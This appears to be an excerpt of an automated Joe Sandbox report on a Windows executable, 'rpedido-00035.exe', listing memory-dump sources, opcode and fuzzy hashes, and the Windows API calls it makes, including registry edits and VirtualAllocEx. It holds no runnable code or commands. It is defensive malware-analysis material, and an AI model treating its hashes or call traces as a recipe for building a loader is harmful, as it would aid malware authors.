                                                          • Opcode ID: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                          • Instruction ID: 1a1db7b112f5c349f32c040b215ce8adb2231ea54f988815808aa67dfaaa6b76
                                                          • Opcode Fuzzy Hash: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                          • Instruction Fuzzy Hash: 6AA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                          • Instruction ID: 81ced8d75bd8cd674d530aa485ef516b0f39a629971cfce93107e9c84bdcedbb
                                                          • Opcode Fuzzy Hash: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                          • Instruction Fuzzy Hash: 4E912170E04228CBDF28CFA8C8547ADBBB1FB44305F14816ED856BB281D778A986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                          • Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
                                                          • Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                          • Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                          • Instruction ID: 1a645af2666a8cd9619cdf871bd9e2c738fb6a6c353dc56c4864b2e7a25bf22b
                                                          • Opcode Fuzzy Hash: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                          • Instruction Fuzzy Hash: 71816771E04228DBEF28CFA8C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004032D6
                                                            • Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
                                                          • SetFilePointer.KERNELBASE(0014BE55,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FilePointer$CountTick
                                                          • String ID:
                                                          • API String ID: 1092082344-0
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402057
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402068
                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID: Call
                                                          • API String ID: 3394109436-1824292864
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseValue
                                                          • String ID:
                                                          • API String ID: 397863658-0
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(00000000), ref: 1000295B
                                                          • GetLastError.KERNEL32 ref: 10002A62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: AllocErrorLastVirtual
                                                          • String ID:
                                                          • API String ID: 497505419-0
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                          • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                          • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                          • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                          APIs
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteValue
                                                          • String ID:
                                                          • API String ID: 2831762973-0
                                                          • Opcode ID: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
                                                          • Instruction ID: eeebe11236d86b478005370e27fb04b66889edd8f93d7ff1d49de92df4b57ee5
                                                          • Opcode Fuzzy Hash: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
                                                          • Instruction Fuzzy Hash: 58F09632A04114DBE711BBA49B4EABEB2A59B44354F16053FFA02F71C1DEFC4D41866D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                            • Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                            • Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
                                                            • Part of subcall function 0040671A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                          • Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
                                                          • Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                          • Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\rpedido-00035.exe,80000000,00000003), ref: 00405EA6
                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405EC8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                          • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                          • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                          • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
